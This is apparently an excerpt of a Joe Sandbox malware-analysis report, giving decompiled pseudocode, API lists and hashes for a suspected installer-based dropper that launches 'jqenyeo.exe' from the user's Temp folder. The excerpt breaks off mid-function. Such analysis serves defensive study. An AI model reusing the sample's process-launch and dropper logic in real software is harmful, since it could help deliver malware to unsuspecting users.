Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405811
0x00405817
0x00405821
0x00405824
0x004059ba
0x004059de
0x004059de
0x004059f1
0x00405a0f
0x00405a11
0x00405a19
0x00405a6f
0x00405a73
0x00000000
0x00000000
0x00405a75
0x00405a7b
0x00000000
0x00000000
0x00405a85
0x00405a8d
0x00405a90
0x00405b92
0x00000000
0x00405b92
0x00405a9f
0x00405aaa
0x00405ab3
0x00405abe
0x00405ac1
0x00405aca
0x00405ad0
0x00405ad3
0x00405ad3
0x00405aeb
0x00405af4
0x00405af7
0x00405afe
0x00405b05
0x00405b0d
0x00405b0d
0x00405b24
0x00405b24
0x00405b2b
0x00405b31
0x00405b3d
0x00405b44
0x00405b4d
0x00405b4f
0x00405b52
0x00405b61
0x00405b64
0x00405b6a
0x00405b6b
0x00405b71
0x00405b72
0x00405b73
0x00405b7b
0x00405b86
0x00405b8c
0x00405b8c
0x00000000
0x00405aeb
0x00405a21
0x00405a51
0x00405a59
0x00405a64
0x00405a64
0x00405a6a
0x00000000
0x00405a6a
0x00405a25
0x00405a2f
0x00000000
0x004059f3
0x004059f9
0x00405a34
0x00000000
0x00405a3d
0x00405a02
0x00405a07
0x00405a0a
0x00000000
0x00405a0a
0x004059f1
0x0040582a
0x0040582e
0x00405836
0x0040583a
0x0040583d
0x00405840
0x00405843
0x00405846
0x00405847
0x00405848
0x00405861
0x00405864
0x0040586e
0x0040587d
0x00405885
0x0040588d
0x00405892
0x00405895
0x004058a1
0x004058aa
0x004058b3
0x004058d5
0x004058db
0x004058ec
0x004058f1
0x004058ff
0x0040590d
0x0040590d
0x00405912
0x00405920
0x00405920
0x00405925
0x00405928
0x0040592d
0x00405939
0x00405942
0x0040594f
0x0040595e
0x00405951
0x00405956
0x00405956
0x0040596a
0x0040596a
0x0040597e
0x00405987
0x00405990
0x004059a0
0x004059ac
0x004059ac
0x00000000

APIs

GetDlgItem.USER32 ref: 00405867
GetDlgItem.USER32 ref: 00405876
GetClientRect.USER32 ref: 004058B3
GetSystemMetrics.USER32 ref: 004058BA
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
ShowWindow.USER32(?,00000008), ref: 00405956
GetDlgItem.USER32 ref: 00405977
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
GetDlgItem.USER32 ref: 00405885

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

GetDlgItem.USER32 ref: 004059C9
CreateThread.KERNEL32 ref: 004059D7
CloseHandle.KERNEL32(00000000), ref: 004059DE
ShowWindow.USER32(00000000), ref: 00405A02
ShowWindow.USER32(?,00000008), ref: 00405A07
ShowWindow.USER32(00000008), ref: 00405A51
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
CreatePopupMenu.USER32 ref: 00405A96
AppendMenuW.USER32 ref: 00405AAA
GetWindowRect.USER32 ref: 00405ACA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
OpenClipboard.USER32(00000000), ref: 00405B2B
EmptyClipboard.USER32 ref: 00405B31
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
GlobalLock.KERNEL32 ref: 00405B47
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
CloseClipboard.USER32 ref: 00405B8C

Strings

H7B, xrefs: 00405AF7
{, xrefs: 00405A6F

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404ab5
0x00404abb
0x00404ac1
0x00404ace
0x00404adc
0x00404adf
0x00404ae7
0x00404aed
0x00404aed
0x00404af9
0x00404afc
0x00404b6a
0x00404b71
0x00404c48
0x00404c4f
0x00404c5e
0x00404c5e
0x00404c62
0x00404c6c
0x00404c79
0x00404c7b
0x00404c7b
0x00404c89
0x00404c90
0x00404c97
0x00404c9a
0x00404cd6
0x00404cd8
0x00404cde
0x00404ce3
0x00404ce7
0x00404ce9
0x00404ce9
0x00404d05
0x00000000
0x00404d07
0x00404d0a
0x00404d18
0x00404d1e
0x00404d1f
0x00404d22
0x00404d25
0x00000000
0x00404d25
0x00404c9c
0x00404c9e
0x00404ca2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ca4
0x00404ca4
0x00404cb1
0x00404cb6
0x00000000
0x00000000
0x00404cba
0x00404cbc
0x00404cbc
0x00404cc5
0x00404cc7
0x00404ccc
0x00404ccf
0x00404cd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cd4
0x00404d31
0x00404d3b
0x00404d3e
0x00404d41
0x00404d48
0x00404d48
0x00404d4a
0x00404d4a
0x00404d4f
0x00404d51
0x00404d59
0x00404d60
0x00404d62
0x00404d6d
0x00404d6d
0x00404d62
0x00404d7d
0x00404d87
0x00404d8f
0x00404daa
0x00404d91
0x00404d9a
0x00404d9a
0x00404d8f
0x00404daf
0x00404db4
0x00404db9
0x00404dc2
0x00404dc2
0x00404dcb
0x00404dcd
0x00404dcd
0x00404dd9
0x00404de1
0x00404deb
0x00404deb
0x00404df0
0x00000000
0x00404df0
0x00404c9a
0x00404c51
0x00404c58
0x00000000
0x00000000
0x00000000
0x00404c58
0x00404b77
0x00404b80
0x00404b9a
0x00404b9f
0x00404ba9
0x00404bb0
0x00404bbc
0x00404bbf
0x00404bc2
0x00404bc9
0x00404bd1
0x00404bd4
0x00404bd8
0x00404bdf
0x00404be7
0x00404c41
0x00404be9
0x00404bea
0x00404bf1
0x00404bfb
0x00404c03
0x00404c10
0x00404c24
0x00404c28
0x00404c28
0x00404c24
0x00404c2d
0x00404c3a
0x00404c3a
0x00404be7
0x00000000
0x00404b9f
0x00404b8d
0x00000000
0x00000000
0x00404b93
0x00000000
0x00404afe
0x00404b0b
0x00404b14
0x00404b21
0x00404b21
0x00404b28
0x00404b2e
0x00404b37
0x00404b3a
0x00404b3d
0x00404b45
0x00404b48
0x00404b4b
0x00404b51
0x00404b58
0x00404b5f
0x00404df6
0x00404e08
0x00404b65
0x00404b68
0x00000000
0x00404b68
0x00404b5f

APIs

GetDlgItem.USER32 ref: 00404B04
SetWindowTextW.USER32(00000000,?), ref: 00404B2E
SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
CoTaskMemFree.OLE32(00000000), ref: 00404BEA
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00423748,00000000,?,?), ref: 00404C1C
lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk), ref: 00404C28
SetDlgItemTextW.USER32 ref: 00404C3A

Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF

Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
Part of subcall function 004068EF: CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18

Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00404C05
A, xrefs: 00404BD8
C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk, xrefs: 00404C16, 00404C1B, 00404C26
H7B, xrefs: 00404BB2

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk$H7B
API String ID: 2624150263-3447255429
Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
